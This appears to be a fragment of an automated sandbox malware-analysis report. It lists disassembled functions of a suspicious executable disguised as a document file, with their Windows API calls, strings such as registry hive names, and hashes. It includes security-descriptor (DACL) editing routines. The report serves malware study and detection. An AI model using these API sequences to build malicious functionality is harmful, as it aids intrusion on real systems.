                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 2698844021-4113822522
                                                        • Opcode ID: 12b3a282e6ac8413e303d8d7dcae3fe70087f526ea5fd0403ed1d8467f1bbf09
                                                        • Instruction ID: 748c977dc442c05933ec47f1f230efa6fa6895107abd4742eae746de0b8b8621
                                                        • Opcode Fuzzy Hash: 12b3a282e6ac8413e303d8d7dcae3fe70087f526ea5fd0403ed1d8467f1bbf09
                                                        • Instruction Fuzzy Hash: 76514AB1104305EFC714EF14C9859AAB7F5EF88718F00886DF896972A1DB79EE09CB91
                                                        Function 00753110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00784085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00753145
                                                        • LoadStringW.USER32(00000000,?,00784085,00000016), ref: 0075314E
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00784085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00753170
                                                        • LoadStringW.USER32(00000000,?,00784085,00000016), ref: 00753173
                                                        • __swprintf.LIBCMT ref: 007531B3
                                                        • __swprintf.LIBCMT ref: 007531C5
                                                        • _wprintf.LIBCMT ref: 0075326C
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00753283
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 984253442-2268648507
                                                        • Opcode ID: d2f877f7f509754fd786bcd46a32992e3d00c74db2d36dc9fd992697061b4bb2
                                                        • Instruction ID: 9d506c93cfb0b5b3d8f7eb8b902367f37639d1cf36db8a611729980096c5e900
                                                        • Opcode Fuzzy Hash: d2f877f7f509754fd786bcd46a32992e3d00c74db2d36dc9fd992697061b4bb2
                                                        • Instruction Fuzzy Hash: 70416472904209FACB14FBD4DD5BEDE7778AF54741F504065B601B20E2DA7D6F48CAA0
                                                        Function 0075D950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0075D96C
                                                        • __swprintf.LIBCMT ref: 0075D98E
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0075D9CB
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0075D9F0
                                                        • _memset.LIBCMT ref: 0075DA0F
                                                        • _wcsncpy.LIBCMT ref: 0075DA4B
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0075DA80
                                                        • CloseHandle.KERNEL32(00000000), ref: 0075DA8B
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0075DA94
                                                        • CloseHandle.KERNEL32(00000000), ref: 0075DA9E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: 38ab1ac80523fb5729dbcd5272617842385733d872c46df523bf2094585a179d
                                                        • Instruction ID: 25a983b101a5c8530507d8f7c0f055a681959c22652ff5fe8ad366c0cab64b5a
                                                        • Opcode Fuzzy Hash: 38ab1ac80523fb5729dbcd5272617842385733d872c46df523bf2094585a179d
                                                        • Instruction Fuzzy Hash: BD318172600208AADB30DFA4DC49FDA77BDFF84701F10C1A6F919D2061EB789E458BA5
                                                        Function 0074957D Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                        • String ID:
                                                        • API String ID: 884005220-0
                                                        • Opcode ID: cd9eb3fdc2dbd16a0b713db5c7f449f19b2602d6b5823c8b48a263b0f28d5671
                                                        • Instruction ID: 6406a08e72e5de8cae82ede8ac2a0c4577d5352f4ca881fbd4cba696541e03e8
                                                        • Opcode Fuzzy Hash: cd9eb3fdc2dbd16a0b713db5c7f449f19b2602d6b5823c8b48a263b0f28d5671
                                                        • Instruction Fuzzy Hash: 2761F272901315EFEB259F38D846BAF77A4EF01320F214126EA419B192DB7DDC41CBA6
                                                        Function 0077E541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0077E564
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0077E57B
                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0077E586
                                                        • CloseHandle.KERNEL32(00000000), ref: 0077E593
                                                        • GlobalLock.KERNEL32(00000000), ref: 0077E59C
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0077E5AB
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0077E5B4
                                                        • CloseHandle.KERNEL32(00000000), ref: 0077E5BB
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0077E5CC
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,0079D9BC,?), ref: 0077E5E5
                                                        • GlobalFree.KERNEL32(00000000), ref: 0077E5F5
                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 0077E619
                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0077E644
                                                        • DeleteObject.GDI32(00000000), ref: 0077E66C
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0077E682
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3840717409-0
                                                        • Opcode ID: b5eb2d085e40aed3992f54ef6e3c6661479d80a111b29a81d7cd173c3e4c5624
                                                        • Instruction ID: f6a90b743f7c09eb8110e065163dd6e9dd903c14a9969d39e2ebf1f4bcd019e9
                                                        • Opcode Fuzzy Hash: b5eb2d085e40aed3992f54ef6e3c6661479d80a111b29a81d7cd173c3e4c5624
                                                        • Instruction Fuzzy Hash: ED414A75600208EFDB219F64DC48EAABBB9FF89755F108099F909D7260D7399D01DB24
                                                        Function 00760B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 00760C93
                                                        • _wcscat.LIBCMT ref: 00760CAB
                                                        • _wcscat.LIBCMT ref: 00760CBD
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00760CD2
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00760CE6
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00760CFE
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00760D18
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00760D2A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                        • String ID: *.*
                                                        • API String ID: 34673085-438819550
                                                        • Opcode ID: 24f52f8cdebece8e53b662b4d2ab0e6fc8683fcbccab8be1fdf0f5b8429827d5
                                                        • Instruction ID: 084ef599de29455c909e2677c6182984da202b97844e24d2a66ccbfe3b53d6f8
                                                        • Opcode Fuzzy Hash: 24f52f8cdebece8e53b662b4d2ab0e6fc8683fcbccab8be1fdf0f5b8429827d5
                                                        • Instruction Fuzzy Hash: 378177715043059FC764DF64C8449AB77E4BB88314F14896AFC86C7251E738DD85CBE2
                                                        Function 0074B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0074B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0074B903
                                                          • Part of subcall function 0074B8E7: GetLastError.KERNEL32(?,0074B3CB,?,?,?), ref: 0074B90D
                                                          • Part of subcall function 0074B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0074B3CB,?,?,?), ref: 0074B91C
                                                          • Part of subcall function 0074B8E7: RtlAllocateHeap.NTDLL(00000000,?,0074B3CB), ref: 0074B923
                                                          • Part of subcall function 0074B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0074B93A
                                                          • Part of subcall function 0074B982: GetProcessHeap.KERNEL32(00000008,0074B3E1,00000000,00000000,?,0074B3E1,?), ref: 0074B98E
                                                          • Part of subcall function 0074B982: RtlAllocateHeap.NTDLL(00000000,?,0074B3E1), ref: 0074B995
                                                          • Part of subcall function 0074B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0074B3E1,?), ref: 0074B9A6
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0074B5F7
                                                        • _memset.LIBCMT ref: 0074B60C
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0074B62B
                                                        • GetLengthSid.ADVAPI32(?), ref: 0074B63C
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0074B679
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0074B695
                                                        • GetLengthSid.ADVAPI32(?), ref: 0074B6B2
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0074B6C1
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0074B6C8
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0074B6E9
                                                        • CopySid.ADVAPI32(00000000), ref: 0074B6F0
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0074B721
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0074B747
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0074B75B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 2347767575-0
                                                        • Opcode ID: fb1e012c0f16c91fbbb6e35ffa0dd6fd91c2c99b5e1c2ddaf57cfb0e88ea4a3b
                                                        • Instruction ID: e2113547693b1fb43bc2a85284970b201d44a41842dba1274b3bedcbdb1d4c5c
                                                        • Opcode Fuzzy Hash: fb1e012c0f16c91fbbb6e35ffa0dd6fd91c2c99b5e1c2ddaf57cfb0e88ea4a3b
                                                        • Instruction Fuzzy Hash: 39515A71900209EBDF119FA5DC85EEEBB79FF48314F04816AE915A7290DB39DE05CB60
                                                        Function 0076A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0076A2DD
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0076A2E9
                                                        • CreateCompatibleDC.GDI32(?), ref: 0076A2F5
                                                        • SelectObject.GDI32(00000000,?), ref: 0076A302
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0076A356
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0076A392
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0076A3B6
                                                        • SelectObject.GDI32(00000006,?), ref: 0076A3BE
                                                        • DeleteObject.GDI32(?), ref: 0076A3C7
                                                        • DeleteDC.GDI32(00000006), ref: 0076A3CE
                                                        • ReleaseDC.USER32(00000000,?), ref: 0076A3D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: 27ccd9006c1a1195589d72f38d84b1212d973b35921530d212abc132152dd1b7
                                                        • Instruction ID: 342c9da3fb63eac1f3236c3f8f700a230a726d2f09080b2327e1e04644f6747f
                                                        • Opcode Fuzzy Hash: 27ccd9006c1a1195589d72f38d84b1212d973b35921530d212abc132152dd1b7
                                                        • Instruction Fuzzy Hash: BD513B76940309EFDB25CFA9C885EAEBBB9EF48310F14841EF956A7210C735AC418B54
                                                        Function 00773AF7 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00772AA6,?,?), ref: 00773B0E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E|
                                                        • API String ID: 3964851224-2413633094
                                                        • Opcode ID: 3217daa7603802baedad45c4ee4e9d0267940028db62ebf8260d4940804a2eba
                                                        • Instruction ID: d6699f4e1fa64b1fef66a84584c43dd12aaacf38951e0ca5064a6399022ef6c3
                                                        • Opcode Fuzzy Hash: 3217daa7603802baedad45c4ee4e9d0267940028db62ebf8260d4940804a2eba
                                                        • Instruction Fuzzy Hash: 1D41A03410024ACBDF05EF14E855BEA3372AF15380F14883DECA56B295DB3C9E1ADB61
                                                        Function 007532B0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00783C64,00000010,00000000,Bad directive syntax error,007ADBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 007532D1
                                                        • LoadStringW.USER32(00000000,?,00783C64,00000010), ref: 007532D8
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • _wprintf.LIBCMT ref: 00753309
                                                        • __swprintf.LIBCMT ref: 0075332B
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00753395
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"}
                                                        • API String ID: 1506413516-3181106796
                                                        • Opcode ID: 5d242b86937e30bfa84afa09836d3ff91dc6ce095a7985c2ec496a0e742b03b2
                                                        • Instruction ID: e274f7b337d592753457b61de06bbe8d30bbf259d44e7b59e0b6559654f7a9d0
                                                        • Opcode Fuzzy Hash: 5d242b86937e30bfa84afa09836d3ff91dc6ce095a7985c2ec496a0e742b03b2
                                                        • Instruction Fuzzy Hash: 5E21717184421DFBDF11AFD0CC0AEEE7735BF14701F00845AB515710A2DABDAA58DBA0
                                                        Function 0075D520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 0075D567
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 0075D589
                                                        • __swprintf.LIBCMT ref: 0075D5DC
                                                        • _wprintf.LIBCMT ref: 0075D68D
                                                        • _wprintf.LIBCMT ref: 0075D6AB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 2116804098-2391861430
                                                        • Opcode ID: 43f97de8b1dad62bc05f6c8a1a71868b3fb9763c5f5738f973ac407692fdb546
                                                        • Instruction ID: 3a0a215f2ad1f84cbeb3cd7541c6beceed324b32bcd251e6d2b54b80fab0e347
                                                        • Opcode Fuzzy Hash: 43f97de8b1dad62bc05f6c8a1a71868b3fb9763c5f5738f973ac407692fdb546
                                                        • Instruction Fuzzy Hash: 53519471900109FACB25FBA4CD46EEEB779EF04301F108166F505B20A1EB796F98DBA1
                                                        Function 0075D338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0075D37F
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0075D3A0
                                                        • __swprintf.LIBCMT ref: 0075D3F3
                                                        • _wprintf.LIBCMT ref: 0075D499
                                                        • _wprintf.LIBCMT ref: 0075D4B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: LoadString_wprintf$__swprintf_memmove
